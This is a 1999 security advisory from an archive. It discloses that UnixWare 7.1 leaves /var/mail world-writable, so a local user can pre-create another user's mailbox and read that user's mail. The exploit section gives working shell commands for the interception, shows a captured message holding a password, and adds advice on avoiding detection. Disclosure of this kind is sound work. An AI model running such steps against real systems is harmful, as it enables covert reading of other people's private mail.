unixware7.mail.txt

1999-12-06T00:00:00
ID PACKETSTORM:11272
Type packetstorm
Reporter Brock Tellier
Modified 1999-12-06T00:00:00

Description

                                        
                                            `Greetings,  
  
OVERVIEW  
Any user can read/modify others' mail.  
  
BACKGROUND  
Only UnixWare 7.1 was tested.  
  
DETAILS  
Imagine my suprise when I saw that /var/mail was mode 777. As such, any  
user may create a file called /var/mail/<username> with a mode readable by  
him and trap all incoming mail. Afraid of getting caught? chown the file  
to <username> (see my advisory on this subject), leaving it still  
world-readable, and no one will ever know who did it.   
  
  
All of this assumes, of course, that the user has not recieved any mail  
yet. If you keep track of your /etc/passwd file, you can monitor for new  
entries and create the files as needed.  
  
This permissions problem obviously opens the door for all sorts of  
problems with symlinks and such. I would imagine that some mail delivery  
programs which aren't as smart as sendmail will follow symlinks in  
/var/mail.  
  
And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG  
LIE:  
  
bash-2.02$ cat /usr/bin/mail  
#!/bin/sh  
cat > /dev/null  
exit 0  
bash-2.02$   
  
;)  
  
EXPLOIT  
  
bash-2.02$ id  
uid=3D106(xnec) gid=3D1(other)  
bash-2.02$ pwd  
/var/mail  
bash-2.02$ touch btellier  
bash-2.02$ chown btellier btellier  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier  
  
Now wait for btellier to get some mail...  
  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier  
bash-2.02$ cat btellier  
=46rom root Sat Dec 4 07:55:29 1999  
Return-Path: root  
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842  
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
From: root@localhost  
Message-Id: <199912041355.HAA04842@localhost>  
Status:   
  
X-Status:   
  
X-SCO-PAD: XXXXXX  
X-SCO-UID: 1  
Content-Length: 52  
  
your ueber-secure password on 0wned.com is a@f9;se0  
bash-2.02$   
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
btellier@usa.net  
  
  
`